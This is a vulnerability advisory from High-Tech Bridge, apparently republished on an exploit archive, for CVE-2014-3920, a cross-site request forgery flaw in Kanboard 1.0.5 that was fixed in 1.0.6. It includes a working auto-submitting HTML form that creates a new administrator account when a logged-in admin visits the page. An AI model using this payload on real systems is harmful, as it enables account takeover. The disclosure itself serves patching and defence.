Kanboard 1.0.5 Cross Site Request Forgery Vulnerability

2014-07-06T00:00:00
ID 1337DAY-ID-22408
Type zdt
Reporter High-Tech Bridge
Modified 2014-07-06T00:00:00

Description

Cross-site request forgery (CSRF) vulnerability in Kanboard before 1.0.6 allows remote attackers to hijack the authentication of administrators for requests that add an administrative user via a save action to the default URI.

                                        
                                            Product: Kanboard
Vendor: http://kanboard.net/
Vulnerable Version(s): 1.0.5 and probably prior
Tested Version: 1.0.5
Advisory Publication:  May 28, 2014  [without technical details]
Vendor Notification: May 28, 2014 
Vendor Patch: June 30, 2014 
Public Disclosure: July 2, 2014 
Vulnerability Type: Cross-Site Request Forgery [CWE-352]
CVE Reference: CVE-2014-3920
Risk Level: Medium 
CVSSv2 Base Score: 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered vulnerability in Kanboard, which can be exploited to perform Сross-Site Request Forgery (CSRF) attacks and gain complete control over the vulnerable application.


1. Сross-Site Request Forgery (CSRF) in Kanboard: CVE-2014-3920

The vulnerability exists due to insufficient verification of the HTTP request origin. A remote attacker can trick a logged-in administrator of Kanboard to visit a specially crafted web page with CSRF exploit code and create new account with administrative privileges. 

Simple CSRF exploit below creates new admin account with login "immuniweb" and password "password":


<form action="http://kanboard/?controller=user&action=save" method="post" name="main">
<input type="hidden" name="username" value="immuniweb">
<input type="hidden" name="name" value="name">
<input type="hidden" name="email" value="[email protected]">
<input type="hidden" name="password" value="password">
<input type="hidden" name="confirmation" value="password">
<input type="hidden" name="default_project_id" value="0">
<input type="hidden" name="is_admin" value="1">
<input type="submit" id="btn">
</form>
<script>
document.main.submit();
</script>


-----------------------------------------------------------------------------------------------

Solution:

Update to Kanboard 1.0.6

More Information:
http://kanboard.net/news

#  0day.today [2018-01-01]  #